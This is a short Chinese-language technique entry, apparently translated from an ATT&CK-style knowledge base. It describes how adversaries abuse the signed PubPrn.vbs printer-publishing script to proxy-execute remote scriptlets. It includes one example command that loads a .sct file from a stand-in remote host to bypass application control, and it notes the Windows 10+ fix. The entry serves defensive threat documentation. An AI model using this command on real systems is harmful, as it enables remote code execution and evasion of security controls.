PubPrn

对手可能会使用 PubPrn 代理执行恶意远程文件。PubPrn.vbs 是一个 Visual Basic 脚本，用于将打印机发布到 Active Directory 域服务。该脚本可能由 Microsoft 签名，通常通过 Cscript.exe 通过 Windows 命令行 执行。例如，以下代码在指定域内发布打印机：cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com。(引用: pubprn) 对手可能会滥用 PubPrn 执行托管在远程站点上的恶意有效负载。(引用: Enigma0x3 PubPrn Bypass) 为此，对手可能会将第二个 script: 参数设置为引用托管在远程站点上的脚本文件 (.sct)。一个示例命令是 pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct。这种行为可能会绕过签名验证限制和不考虑滥用此脚本的应用程序控制解决方案。 在 Windows 的较新版本（10+）中，PubPrn.vbs 已更新以防止代理执行来自远程站点的代码。这是通过将第二个参数中指定的协议限制为 LDAP://，而不是可以通过 HTTP(S) 引用远程代码的 script: 标识符来实现的。